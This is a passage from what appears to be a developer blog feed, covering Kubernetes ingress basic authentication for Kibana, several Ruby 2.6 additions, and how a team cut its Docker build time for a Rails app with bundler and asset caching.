href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>,<a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>,<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">configmap</a>,<a href="https://kubernetes.io/docs/concepts/services-networking/ingress/">ingress</a>and<a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/annotations/">annotations</a></p></li></ul><p>First, let's create ingress resources from upstream example by running thefollowing command.</p><pre><code class="language-bash">$ kubectl create -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/mandatory.yamlnamespace &quot;ingress-nginx&quot; createddeployment &quot;default-http-backend&quot; createdservice &quot;default-http-backend&quot; createdconfigmap &quot;nginx-configuration&quot; createdconfigmap &quot;tcp-services&quot; createdconfigmap &quot;udp-services&quot; createdserviceaccount &quot;nginx-ingress-serviceaccount&quot; createdclusterrole &quot;nginx-ingress-clusterrole&quot; createdrole &quot;nginx-ingress-role&quot; createdrolebinding &quot;nginx-ingress-role-nisa-binding&quot; createdclusterrolebinding &quot;nginx-ingress-clusterrole-nisa-binding&quot; createddeployment &quot;nginx-ingress-controller&quot; created</code></pre><p>Now that ingress controller resources are created we need a service to accessthe ingress.</p><p>Use following manifest to create service for ingress.</p><pre><code class="language-yaml">apiVersion: v1kind: Servicemetadata:  annotations:    service.beta.kubernetes.io/aws-load-balancer-backend-protocol: tcp  labels:    k8s-addon: ingress-nginx.addons.k8s.io  name: ingress-nginx  namespace: ingress-nginxspec:  externalTrafficPolicy: Cluster  ports:    - name: https      port: 443      protocol: TCP      targetPort: http    - name: http      port: 80      protocol: TCP      targetPort: http  selector:    app: ingress-nginx  type: LoadBalancer</code></pre><p>Now, get the ELB endpoint and bind it with some domain name.</p><pre><code class="language-bash">$kubectl create -f ingress-service.ymlservice ingress-nginx created$ kubectl -n ingress-nginx get svc  ingress-nginx -o wideNAME            CLUSTER-IP      EXTERNAL-IP                                                               PORT(S)                      AGE       SELECTORingress-nginx   100.71.250.56   abcghccf8540698e8bff782799ca8h04-1234567890.us-east-2.elb.amazonaws.com   80:30032/TCP,443:30108/TCP   10s       app=ingress-nginx</code></pre><p>Let's create a deployment and service for our sample application kibana. We needelasticsearch to run kibana.</p><p>Here is manifest for the sample application.</p><pre><code class="language-yaml">---apiVersion: extensions/v1beta1kind: Deploymentmetadata:  labels:    app: kibana  name: kibana  namespace: ingress-nginxspec:  replicas: 1  template:    metadata:      labels:        app: kibana    spec:      containers:        - image: kibana:latest          name: kibana          ports:            - containerPort: 5601---apiVersion: v1kind: Servicemetadata:  annotations:  labels:    app: kibana  name: kibana  namespace: ingress-nginxspec:  ports:    - name: kibana      port: 5601      targetPort: 5601  selector:    app: kibana---apiVersion: extensions/v1beta1kind: Deploymentmetadata:  labels:    app: elasticsearch  name: elasticsearch  namespace: ingress-nginxspec:  replicas: 1  strategy:    type: RollingUpdate  template:    metadata:      labels:        app: elasticsearch    spec:      containers:        - image: elasticsearch:latest          name: elasticsearch          ports:            - containerPort: 5601---apiVersion: v1kind: Servicemetadata:  annotations:  labels:    app: elasticsearch  name: elasticsearch  namespace: ingress-nginxspec:  ports:    - name: elasticsearch      port: 9200      targetPort: 9200  selector:    app: elasticsearch</code></pre><p>Create the sample application.</p><pre><code class="language-bash">kubectl apply -f kibana.ymldeployment &quot;kibana&quot; createdservice &quot;kibana&quot; createddeployment &quot;elasticsearch&quot; createdservice &quot;elasticsearch&quot; created</code></pre><p>Now that we have created application and ingress resources, it's time to createan ingress and access the application.</p><p>Use the following manifest to create ingress.</p><pre><code class="language-yaml">apiVersion: extensions/v1beta1kind: Ingressmetadata:  annotations:  name: kibana-ingress  namespace: ingress-nginxspec:  rules:    - host: logstest.myapp-staging.com      http:        paths:          - path: /            backend:              serviceName: kibana              servicePort: 5601</code></pre><pre><code class="language-bash">$kubectl -n ingress-nginx create -f ingress.ymlingress &quot;kibana-ingress&quot; created.</code></pre><p>Now that our application is up, when we access the kibana dashboard using URLhttp://logstest.myapp-staging.com We directly have access to our Kibanadashboard and anyone with this URL can access logs as shown in the followingimage.</p><p><img src="/blog_images/2018/using-kubernetes-ingress-authentication/kibana.png" alt="Kibana dashboard without authentication"></p><p>Now, let's set up a basic authentication using htpasswd.</p><p>Follow below commands to generate the secret for credentials.</p><p>Let's create an auth file with username and password.</p><pre><code class="language-bash">$ htpasswd -c auth kibanaadminNew password: &lt;kibanaadmin&gt;New password:Re-type new password:Adding password for user kibanaadmin</code></pre><p>Create k8s secret.</p><pre><code class="language-bash">$ kubectl -n ingress-nginx create secret generic basic-auth --from-file=authsecret &quot;basic-auth&quot; created</code></pre><p>Verify the secret.</p><pre><code class="language-yaml">kubectl get secret basic-auth -o yamlapiVersion: v1data:  auth: Zm9vOiRhcHIxJE9GRzNYeWJwJGNrTDBGSERBa29YWUlsSDkuY3lzVDAKkind: Secretmetadata:  name: basic-auth  namespace: ingress-nginxtype: Opaque</code></pre><p>Use following annotations in our ingress manifest by updating the ingressmanifest.</p><pre><code class="language-bash">kubectl -n ingress-nginx edit ingress kibana ingress</code></pre><p>Paste the following annotations</p><pre><code class="language-bash">nginx.ingress.kubernetes.io/auth-type: basicnginx.ingress.kubernetes.io/auth-secret: basic-authnginx.ingress.kubernetes.io/auth-realm: &quot;Kibana Authentication Required - kibanaadmin&quot;</code></pre><p>Now that ingress is updated, hit the URL again and as shown in the image belowwe are asked for authentication.</p><p><img src="/blog_images/2018/using-kubernetes-ingress-authentication/kibana_auth.png" alt="Kibana dashboard without authentication"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds write_timeout to Net::HTTP]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-write-timeout-to-net-http"/>
      <updated>2018-08-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-write-timeout-to-net-http</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.6, if we created a large request with <code>Net::HTTP</code>, it would hangforever until request is interrupted. To fix this issue,<a href="https://docs.ruby-lang.org/en/trunk/Net/HTTP.html#attribute-i-write_timeout">write_timeout</a>attribute and<a href="https://docs.ruby-lang.org/en/trunk/Net/HTTP.html#method-i-write_timeout-3D">write_timeout=</a>method is added to <a href="https://docs.ruby-lang.org/en/2.6.0/">Net::HTTP</a> in Ruby2.6. Default value for <code>write_timeout</code> is 60 seconds and can be set to aninteger or a float value.</p><p>Similarly, <code>write_timeout</code> attribute and <code>write_timeout=</code> method is added to<code>Net::BufferedIO</code> class.</p><p>If any chunk of response is not written within number of seconds provided to<code>write_timeout</code>, <a href="https://docs.ruby-lang.org/en/2.6.0/">Net::WriteTimeout</a>exception is raised. <code>Net::WriteTimeout</code> exception is not raised on Windowssystems.</p><h6>Example</h6><pre><code class="language-ruby"># server.rbrequire 'socket'server = TCPServer.new('localhost', 2345)loop dosocket = server.acceptend</code></pre><h5>Ruby 2.5.1</h5><pre><code class="language-ruby"># client.rbrequire 'net/http'connection = Net::HTTP.new('localhost', 2345)connection.open_timeout = 1connection.read_timeout = 3connection.startpost = Net::HTTP::Post.new('/')body = (('a' _ 1023) + &quot;\n&quot;) _ 5_000post.body = bodyputs &quot;Sending #{body.bytesize} bytes&quot;connection.request(post)</code></pre><h6>Output</h6><pre><code class="language-ruby">\$ RBENV_VERSION=2.5.1 ruby client.rbSending 5120000 bytes</code></pre><p>Ruby 2.5.1 processes request endlessly unless above program is interrupted.</p><h5>Ruby 2.6.0-dev</h5><p>Add <code>write_timeout</code> attribute to <code>Net::HTTP</code> instance in client.rb program.</p><pre><code class="language-ruby"># client.rbrequire 'net/http'connection = Net::HTTP.new('localhost', 2345)connection.open_timeout = 1connection.read_timeout = 3# set write_timeout to 10 secondsconnection.write_timeout = 10connection.startpost = Net::HTTP::Post.new('/')body = (('a' _ 1023) + &quot;\n&quot;) _ 5_000post.body = bodyputs &quot;Sending #{body.bytesize} bytes&quot;connection.request(post)</code></pre><h6>Output</h6><pre><code class="language-ruby">\$ RBENV_VERSION=2.6.0-dev ruby client.rbSending 5120000 bytesTraceback (most recent call last):13: `from client.rb:17:in `&lt;main&gt;`` 12: `from /net/http.rb:1479:in `request``11: `from /net/http.rb:1506:in `transport_request`` 10: `from /net/http.rb:1506:in `catch``9: `from /net/http.rb:1507:in `block in transport_request`` 8: `from /net/http/generic_request.rb:123:in `exec``7: `from /net/http/generic_request.rb:189:in `send_request_with_body`` 6: `from /net/protocol.rb:221:in `write``5: `from /net/protocol.rb:239:in `writing`` 4: `from /net/protocol.rb:222:in `block in write``3: `from /net/protocol.rb:249:in `write0`` 2: `from /net/protocol.rb:249:in `each_with_index``1: `from /net/protocol.rb:249:in `each`` `/net/protocol.rb:270:in `block in write0`: Net::WriteTimeout (Net::WriteTimeout)`</code></pre><p>In Ruby 2.6.0, above program is terminated raising <code>Net::WriteTimeout</code> exceptionafter 10 seconds (value set to <code>write_timeout</code> attribute).</p><p>Here is relevant <a href="https://github.com/ruby/ruby/commit/bd7c46">commit</a> and<a href="https://bugs.ruby-lang.org/issues/13396">discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds Dir#each_child & Dir#children instance]]></title>
       <author><name>Tejaswini Chile</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-introduces-dir-each_child-and-dir-children-instance-methods"/>
      <updated>2018-08-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-introduces-dir-each_child-and-dir-children-instance-methods</id>
      <content type="html"><![CDATA[<p>Ruby 2.5 had introduced class level methods<a href="https://ruby-doc.org/core-2.5.1/Dir.html#method-c-each_child">Dir::each_child</a>and <a href="https://ruby-doc.org/core-2.5.1/Dir.html#method-c-children">Dir::children</a>.We wrote a<a href="https://blog.bigbinary.com/2017/11/21/ruby-2_5-introduces-dir-children-and-dir-each_child.html">detailed blog</a>about it.</p><p>In Ruby 2.6, same methods are added as instance methods on <code>Dir</code> class.Dir#children (Link is not available) returns array of all the filenames except<code>.</code> and <code>..</code> in the directory. Dir#each_child (Link is not available) yields allthe filenames and operates on it.</p><p>Let's have a look at examples to understand it better.</p><h5>Dir#children</h5><pre><code class="language-ruby">directory = Dir.new('/Users/tejaswinichile/workspace')directory.children=&gt; [&quot;panda.png&quot;, &quot;apple.png&quot;, &quot;banana.png&quot;, &quot;camera.jpg&quot;]</code></pre><p><code>Dir#each_child</code> iterates and calls block for each file entry in the givendirectory. It uses filename as a parameter to the block.</p><h5>Dir#each_child</h5><pre><code class="language-ruby">directory = Dir.new('/Users/tejaswinichile/workspace')directory.each_child { |filename| puts &quot;Currently reading: #{filename}&quot;}Currently reading: panda.pngCurrently reading: apple.pngCurrently reading: banana.pngCurrently reading: camera.jpg=&gt; #&lt;Dir:/Users/tejaswinichile/Desktop&gt;</code></pre><p>If we don't pass any block to <code>each_child</code>, it returns enumerator instead.</p><pre><code class="language-ruby">directory = Dir.new('/Users/tejaswinichile/workspace')directory.each_child=&gt; #&lt;Enumerator: #&lt;Dir:/Users/tejaswinichile/Desktop&gt;:each_child&gt;</code></pre><p>Here is relevant<a href="https://github.com/ruby/ruby/commit/6a3a7e9114c3ede47d15f0d2a73f392cfcdd1ea7">commit</a>and <a href="https://bugs.ruby-lang.org/issues/13969">discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds exception parameters for Integer & Float methods]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-option-to-not-raise-exception-for-integer-float-methods"/>
      <updated>2018-07-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-option-to-not-raise-exception-for-integer-float-methods</id>
      <content type="html"><![CDATA[<p>We can use <code>Integer</code> and <code>Float</code> methods to convert values to integers andfloats respectively. Ruby also has <code>to_i</code> and <code>to_f</code> methods for same purpose.Let's see how it differs from the <code>Integer</code> method.</p><pre><code class="language-ruby">&gt; &gt; &quot;1one&quot;.to_i&gt; &gt; =&gt; 1&gt; &gt; Integer(&quot;1one&quot;)&gt; &gt; ArgumentError: invalid value for Integer(): &quot;1one&quot;    from (irb):2:in `Integer'    from (irb):2    from /Users/prathamesh/.rbenv/versions/2.4.0/bin/irb:11:in `&lt;main&gt;'&gt; &gt;</code></pre><p>The <code>to_i</code> method tries to convert the given input to integer as much aspossible whereas the <code>Integer</code> method throws an <code>ArgumentError</code> if it can'tcovert the input to integer. The <code>Integer</code> and <code>Float</code> methods parse morestrictly compared to <code>to_i</code> and <code>to_f</code> respectively.</p><p>Some times, we might need the strictness of <code>Integer</code> and <code>Float</code> but ability tonot raise an exception every time the input can't be parsed.</p><p>Before Ruby 2.6 it was possible to achieve it in following way.</p><pre><code class="language-ruby">&gt; &gt; Integer(&quot;msg&quot;) rescue nil&gt; &gt;</code></pre><p>In Ruby 2.6, the<a href="https://bugs.ruby-lang.org/issues/12732">Integer and Float methods accept a keyword argument exception</a>which can be either <code>true</code> or <code>false</code>. If it is <code>false</code> then no exception israised if the input can't be parsed and <code>nil</code> is returned.</p><pre><code class="language-ruby">&gt; &gt; Float(&quot;foo&quot;, exception: false)&gt; &gt; =&gt; nil&gt; &gt; Integer(&quot;foo&quot;, exception: false)&gt; &gt; =&gt; nil&gt; &gt;</code></pre><p>This is also faster than rescuing the exception and returning <code>nil</code>.</p><pre><code class="language-ruby">&gt; &gt; Benchmark.ips do |x|&gt; &gt; ?&gt; x.report(&quot;rescue&quot;) {&gt; &gt; ?&gt; Integer('foo') rescue nil&gt; &gt; }&gt; &gt; x.report(&quot;kwarg&quot;) {&gt; &gt; ?&gt; Integer('foo', exception: false)&gt; &gt; }&gt; &gt; x.compare!&gt; &gt; end&gt; &gt; Warming up --------------------------------------              rescue    41.896k i/100ms               kwarg    81.459k i/100msCalculating -------------------------------------rescue 488.006k ( 4.5%) i/s - 2.472M in 5.076848skwarg 1.024M (11.8%) i/s - 5.050M in 5.024937sComparison:kwarg: 1023555.3 i/srescue: 488006.0 i/s - 2.10x slower</code></pre><p>As we can see, rescuing the exception is twice slower than using the new keywordargument. We can still use the older technique if we want to return a differentvalue from <code>nil</code>.</p><pre><code class="language-ruby">&gt; &gt; Integer('foo') rescue 42&gt; &gt; =&gt; 42&gt; &gt;</code></pre><p>By default, the keyword argument <code>exception</code> is set to <code>true</code> for backwardcompatibility.</p><p>The Chinese version of this blog is available<a href="http://madao.me/yi-ruby-2-6-zeng-jia-liao-integer-he-float-fang-fa-de-yi-chang-can-shu/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Speed up Docker image build process of a Rails app]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/speeding-up-docker-image-build-process-of-a-rails-application"/>
      <updated>2018-07-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/speeding-up-docker-image-build-process-of-a-rails-application</id>
      <content type="html"><![CDATA[<p><strong>tl;dr : We reduced the Docker image building time from 10 minutes to 5 minutesby reusing bundler cache and by precompiling assets.</strong></p><p>We deploy one of our Rails applications on a dedicated Kubernetes cluster.Kubernetes is a good fit for us since as per the load and resource consumption,Kubernetes horizontally scales the containerized application automatically. Theprerequisite to deploy any kind of application on Kubernetes is that theapplication needs to be containerized. We use Docker to containerize ourapplication.</p><p>We have been successfully containerizing and deploying our Rails application onKubernetes for about a year now. Although containerization was working fine, wewere not happy with the overall time spent to containerize the applicationwhenever we changed the source code and deployed the app.</p><p>We use <a href="https://jenkins.io/">Jenkins</a> for building on-demand Docker images ofour application with the help of<a href="https://wiki.jenkins-ci.org/display/JENKINS/CloudBees+Docker+Build+and+Publish+plugin">CloudBees Docker Build and Publish plugin</a>.</p><p>We observed that the average build time of a Jenkins job to build a Docker imagewas about 9 to 10 minutes.</p><p><img src="/blog_images/2018/speeding-up-docker-image-build-process-of-a-rails-application/build-time-trend-before-speedup-tweaks.png" alt="Screenshot of build time trend graph before speedup tweaks"></p><h2>Investigating what takes most time</h2><p>We wipe the workspace folder of the Jenkins job after finishing each Jenkinsbuild to avoid any unintentional behavior caused by the residue left from aprevious build. The application's folder is about 500 MiB in size. Each Jenkinsbuild spends about 20 seconds to perform a shallow Git clone of the latestcommit of the specified git branch from our remote GitHub repository.</p><p>After cloning the latest source code, Jenkins executes <code>docker build</code> command tobuild a Docker image with a unique tag to containerize the cloned source code ofthe application.</p><p>Jenkins build spends another 10 seconds invoking <code>docker build</code> command andsending build context to Docker daemon.</p><pre><code class="language-bash">01:05:43 [docker-builder] $ docker build --build-arg RAILS_ENV=production -t bigbinary/xyz:production-role-management-feature-1529436929 --pull=true --file=./Dockerfile /var/lib/jenkins/workspace/docker-builder01:05:53 Sending build context to Docker daemon 489.4 MB</code></pre><p>We use the same Docker image on a number of Kubernetes pods. Therefore, we donot want to execute <code>bundle install</code> and <code>rake assets:precompile</code> tasks whilestarting a container in each pod which would prevent that pod from accepting anyrequests until these tasks are finished.</p><p>The recommended approach is to run <code>bundle install</code> and <code>rake assets:precompile</code>tasks while or before containerizing the Rails application.</p><p>Following is a trimmed down version of our actual Dockerfile which is used by<code>docker build</code> command to containerize our application.</p><pre><code class="language-dockerfile">FROM bigbinary/xyz-base:latestENV APP_PATH /data/app/WORKDIR $APP_PATHADD . $APP_PATHARG RAILS_ENVRUN bin/bundle install --without development testRUN bin/rake assets:precompileCMD [&quot;bin/bundle&quot;, &quot;exec&quot;, &quot;puma&quot;]</code></pre><p>The <code>RUN</code> instructions in the above Dockerfile executes <code>bundle install</code> and<code>rake assets:precompile</code> tasks while building a Docker image. Therefore, when aKubernetes pod is created using such a Docker image, Kubernetes pulls the image,starts a Docker container using that image inside the pod and runs <code>puma</code> serverimmediately.</p><p>The base Docker image which we use in the <code>FROM</code> instruction contains necessarysystem packages. We rarely need to update any system package. Therefore, anintermediate layer which may have been built previously for that instruction isreused while executing the <code>docker build</code> command. If the layer for <code>FROM</code>instruction is reused, Docker reuses cached layers for the next two instructionssuch as <code>ENV</code> and <code>WORKDIR</code> respectively since both of them are never changed.</p><pre><code class="language-bash">01:05:53 Step 1/8 : FROM bigbinary/xyz-base:latest01:05:53 latest: Pulling from bigbinary/xyz-base01:05:53 Digest: sha256:193951cad605d23e38a6016e07c5d4461b742eb2a89a69b614310ebc898796f001:05:53 Status: Image is up to date for bigbinary/xyz-base:latest01:05:53  ---&gt; c2ab738db40501:05:53 Step 2/8 : ENV APP_PATH /data/app/01:05:53  ---&gt; Using cache01:05:53  ---&gt; 5733bc978f1901:05:53 Step 3/8 : WORKDIR $APP_PATH01:05:53  ---&gt; Using cache01:05:53  ---&gt; 0e5fbc868af8</code></pre><p>Docker checks contents of the files in the image and calculates checksum foreach file for an <code>ADD</code> instruction. Since source code changes often, thepreviously cached layer for the <code>ADD</code> instruction is invalidated due to themismatching checksums. Therefore, the 4th instruction <code>ADD</code> in our Dockerfilehas to add the local files in the provided build context to the filesystem ofthe image being built in a separate intermediate container instead of reusingthe previously cached instruction layer. On an average, this instruction spendsabout 25 seconds.</p><pre><code class="language-bash">01:05:53 Step 4/8 : ADD . $APP_PATH01:06:12  ---&gt; cbb9a6ac297e01:06:17 Removing intermediate container 99ca98218d99</code></pre><p>We need to build Docker images for our application using different Railsenvironments. To achieve that, we trigger a<a href="https://wiki.jenkins.io/display/JENKINS/Parameterized+Build">parameterized Jenkins build</a>by specifying the needed Rails environment parameter. This parameter is thenpassed to the <code>docker build</code> command using <code>--build-arg RAILS_ENV=production</code>option. The <code>ARG</code> instruction in the Dockerfile defines <code>RAILS_ENV</code> variable andis implicitly used as an environment variable by the rest of the instructionsdefined just after that <code>ARG</code> instruction. Even if the previous <code>ADD</code>instruction didn't invalidate build cache; if the <code>ARG</code> variable is differentfrom a previous build, then a &quot;cache miss&quot; occurs and the build cache isinvalidated for the subsequent instructions.</p><pre><code class="language-bash">01:06:17 Step 5/8 : ARG RAILS_ENV01:06:17  ---&gt; Running in b793b8cc2fe701:06:22  ---&gt; b8a70589e38401:06:24 Removing intermediate container b793b8cc2fe7</code></pre><p>The next two <code>RUN</code> instructions are used to install gems and precompile staticassets using sprockets. As earlier instruction(s) already invalidates the buildcache, these <code>RUN</code> instructions are mostly executed instead of reusing cachedlayer. The <code>bundle install</code> command takes about 2.5 minutes and the<code>rake assets:precompile</code> task takes about 4.35 minutes.</p><pre><code class="language-bash">01:06:24 Step 6/8 : RUN bin/bundle install --without development test01:06:24  ---&gt; Running in a556c7ca842a01:06:25 bin/bundle install --without development test01:08:22  ---&gt; 82ab04f1ff4201:08:40 Removing intermediate container a556c7ca842a01:08:58 Step 7/8 : RUN bin/rake assets:precompile01:08:58  ---&gt; Running in b345c73a22c01:08:58 bin/bundle exec rake assets:precompile01:09:07 ** Invoke assets:precompile (first_time)01:09:07 ** Invoke assets:environment (first_time)01:09:07 ** Execute assets:environment01:09:07 ** Invoke environment (first_time)01:09:07 ** Execute environment01:09:12 ** Execute assets:precompile01:13:20  ---&gt; 57bf04f3c11101:13:23 Removing intermediate container b345c73a22c</code></pre><p>Above both <code>RUN</code> instructions clearly looks like the main culprit which wereslowing down the whole <code>docker build</code> command and thus the Jenkins build.</p><p>The final instruction <code>CMD</code> which starts the <code>puma</code> server takes another 10seconds. After building the Docker image, the <code>docker push</code> command spendsanother minute.</p><pre><code class="language-bash">01:13:23 Step 8/8 : CMD [&quot;bin/bundle&quot;, &quot;exec&quot;, &quot;puma&quot;]01:13:23  ---&gt; Running in 104967ad155301:13:31  ---&gt; 35d2259cdb1d01:13:34 Removing intermediate container 104967ad155301:13:34 [0mSuccessfully built 35d2259cdb1d01:13:35 [docker-builder] $ docker inspect 35d2259cdb1d01:13:35 [docker-builder] $ docker push bigbinary/xyz:production-role-management-feature-152943692901:13:35 The push refers to a repository [docker.io/bigbinary/xyz]01:14:21 d67854546d53: Pushed01:14:22 production-role-management-feature-1529436929: digest: sha256:07f86cfd58fac412a38908d7a7b7d0773c6a2980092df416502d7a5c051910b3 size: 410601:14:22 Finished: SUCCESS</code></pre><p>So, we found the exact commands which were causing the <code>docker build</code> command totake so much time to build a Docker image.</p><p>Let's summarize the steps involved in building our Docker image and the averagetime each needed to finish.</p><table><thead><tr><th>Command or Instruction</th><th>Average Time Spent</th></tr></thead><tbody><tr><td>Shallow clone of Git Repository by Jenkins</td><td>20 Seconds</td></tr><tr><td>Invocation of <code>docker build</code> by Jenkins and sending build context to Docker daemon</td><td>10 Seconds</td></tr><tr><td><code>FROM bigbinary/xyz-base:latest</code></td><td>0 Seconds</td></tr><tr><td><code>ENV APP_PATH /data/app/</code></td><td>0 Seconds</td></tr><tr><td><code>WORKDIR $APP_PATH</code></td><td>0 Seconds</td></tr><tr><td><code>ADD . $APP_PATH</code></td><td>25 Seconds</td></tr><tr><td><code>ARG RAILS_ENV</code></td><td>7 Seconds</td></tr><tr><td><code>RUN bin/bundle install --without development test</code></td><td>2.5 Minutes</td></tr><tr><td><code>RUN bin/rake assets:precompile</code></td><td>4.35 Minutes</td></tr><tr><td><code>CMD [&quot;bin/bundle&quot;, &quot;exec&quot;, &quot;puma&quot;]</code></td><td>1.15 Minutes</td></tr><tr><td><strong>Total</strong></td><td><strong>9 Minutes</strong></td></tr></tbody></table><p>Often, people build Docker images from a single Git branch, like <code>master</code>. Sincechanges in a single branch are incremental and hardly has differences in the<code>Gemfile.lock</code> file across commits, bundler cache need not be managedexplicitly. Instead, Docker automatically reuses the previously built layer forthe <code>RUN bundle install</code> instruction if the <code>Gemfile.lock</code> file remainsunchanged.</p><p>In our case, this does not happen. For every new feature or a bug fix, we createa separate Git branch. To verify the changes on a particular branch, we deploy aseparate review app which serves the code from that branch. To achieve thisworkflow, everyday we need to build a lot of Docker images containing sourcecode from varying Git branches as well as with varying environments. Most of thetimes, the <code>Gemfile.lock</code> and assets have different versions across these Gitbranches. Therefore, it is hard for Docker to cache layers for <code>bundle install</code>and <code>rake assets:precompile</code> tasks and reuse those layers during every<code>docker build</code> command run with different application source code and adifferent environment. This is why the previously built Docker layer for the<code>RUN bin/bundle install</code> instruction and the <code>RUN bin/rake assets:precompile</code>instruction was often not being used in our case. This reason was causing the<code>RUN</code> instructions to be executed without reusing the previously built Dockerlayer cache while performing every other Docker build.</p><p>Before discussing the approaches to speed up our Docker build flow, let'sfamiliarize with the <code>bundle install</code> and <code>rake assets:precompile</code> tasks and howto speed up them by reusing cache.</p><h2>Speeding up &quot;bundle install&quot; by using cache</h2><p>By default, Bundler installs gems at the location which is set by Rubygems.Also, Bundler looks up for the installed gems at the same location.</p><p>This location can be explicitly changed by using <code>--path</code> option.</p><p>If <code>Gemfile.lock</code> does not exist or no gem is found at the explicitly providedlocation or at the default gem path then <code>bundle install</code> command fetches allremote sources, resolves dependencies if needed and installs required gems asper <code>Gemfile</code>.</p><p>The <code>bundle install --path=vendor/cache</code> command would install the gems at the<code>vendor/cache</code> location in the current directory. If the same command is runwithout making any change in <code>Gemfile</code>, since the gems were already installedand cached in <code>vendor/cache</code>, the command will finish instantly because Bundlerneed not to fetch any new gems.</p><p>The tree structure of <code>vendor/cache</code> directory looks like this.</p><pre><code class="language-tree">vendor/cache aasm-4.12.3.gem actioncable-5.1.4.gem activerecord-5.1.4.gem [...] ruby  2.4.0      bin       aws.rb       dotenv       erubis       [...]      build_info       nokogiri-1.8.1.info      bundler       gems           activeadmin-043ba0c93408          [...]      cache       aasm-4.12.3.gem       actioncable-5.1.4.gem       [...]       bundler        git      specifications          aasm-4.12.3.gemspec          actioncable-5.1.4.gemspec          activerecord-5.1.4.gemspec          [...]           [...][...]</code></pre><p>It appears that Bundler keeps two separate copies of the <code>.gem</code> files at twodifferent locations, <code>vendor/cache</code> and <code>vendor/cache/ruby/VERSION_HERE/cache</code>.</p><p>Therefore, even if we remove a gem in the <code>Gemfile</code>, then that gem will beremoved only from the <code>vendor/cache</code> directory. The<code>vendor/cache/ruby/VERSION_HERE/cache</code> will still have the cached <code>.gem</code> filefor that removed gem.</p><p>Let's see an example.</p><p>We have <code>'aws-sdk', '2.11.88'</code> gem in our Gemfile and that gem is installed.</p><pre><code class="language-bash">$ ls vendor/cache/aws-sdk-*vendor/cache/aws-sdk-2.11.88.gemvendor/cache/aws-sdk-core-2.11.88.gemvendor/cache/aws-sdk-resources-2.11.88.gem$ ls vendor/cache/ruby/2.4.0/cache/aws-sdk-*vendor/cache/ruby/2.4.0/cache/aws-sdk-2.11.88.gemvendor/cache/ruby/2.4.0/cache/aws-sdk-core-2.11.88.gemvendor/cache/ruby/2.4.0/cache/aws-sdk-resources-2.11.88.gem</code></pre><p>Now, we will remove the <code>aws-sdk</code> gem from Gemfile and run <code>bundle install</code>.</p><pre><code class="language-bash">$ bundle install --path=vendor/cacheUsing rake 12.3.0Using aasm 4.12.3[...]Updating files in vendor/cacheRemoving outdated .gem files from vendor/cache  * aws-sdk-2.11.88.gem  * jmespath-1.3.1.gem  * aws-sdk-resources-2.11.88.gem  * aws-sdk-core-2.11.88.gem  * aws-sigv4-1.0.2.gemBundled gems are installed into `./vendor/cache`$ ls vendor/cache/aws-sdk-*no matches found: vendor/cache/aws-sdk-*$ ls vendor/cache/ruby/2.4.0/cache/aws-sdk-*vendor/cache/ruby/2.4.0/cache/aws-sdk-2.11.88.gemvendor/cache/ruby/2.4.0/cache/aws-sdk-core-2.11.88.gemvendor/cache/ruby/2.4.0/cache/aws-sdk-resources-2.11.88.gem</code></pre><p>We can see that the cached version of gem(s) remained unaffected.</p><p>If we add the same gem <code>'aws-sdk', '2.11.88'</code> back to the Gemfile and perform<code>bundle install</code>, instead of fetching that gem from remote Gem repository,Bundler will install that gem from the cache.</p><pre><code class="language-bash">$ bundle install --path=vendor/cacheResolving dependencies........[...]Using aws-sdk 2.11.88[...]Updating files in vendor/cache  * aws-sigv4-1.0.3.gem  * jmespath-1.4.0.gem  * aws-sdk-core-2.11.88.gem  * aws-sdk-resources-2.11.88.gem  * aws-sdk-2.11.88.gem$ ls vendor/cache/aws-sdk-*vendor/cache/aws-sdk-2.11.88.gemvendor/cache/aws-sdk-core-2.11.88.gemvendor/cache/aws-sdk-resources-2.11.88.gem</code></pre><p>What we understand from this is that if we can reuse the explicitly provided<code>vendor/cache</code> directory every time we need to execute <code>bundle install</code> command,then the command will be much faster because Bundler will use gems from localcache instead of fetching from the Internet.</p><h2>Speeding up &quot;rake assets:precompile&quot; task by using cache</h2><p>JavaScript code written in TypeScript, Elm, JSX etc cannot be directly served tothe browser. Almost all web browsers understands JavaScript (ES4), CSS and imagefiles. Therefore, we need to transpile, compile or convert the source asset intothe formats which browsers can understand. In Rails,<a href="https://github.com/rails/sprockets">Sprockets</a> is the most widely used libraryfor managing and compiling assets.</p><p>In development environment, Sprockets compiles assets on-the-fly as and whenneeded using <code>Sprockets::Server</code>. In production environment, recommendedapproach is to pre-compile assets in a directory on disk and serve it using aweb server like Nginx.</p><p>Precompilation is a multi-step process for converting a source asset file into astatic and optimized form using components such as processors, transformers,compressors, directives, environments, a manifest and pipelines with the help ofvarious gems such as <code>sass-rails</code>, <code>execjs</code>, etc. The assets need to beprecompiled in production so that Sprockets need not resolve inter-dependenciesbetween required source dependencies every time a static asset is requested. Tounderstand how Sprockets work in great detail, please read<a href="https://github.com/rails/sprockets/blob/0cb3314368f9f9e84343ebedcc09c7137e920bc4/guides/how_sprockets_works.md#sprockets">this guide</a>.</p><p>When we compile source assets using <code>rake assets:precompile</code> task, we can findthe compiled assets in <code>public/assets</code> directory inside our Rails application.</p><pre><code class="language-bash">$ ls 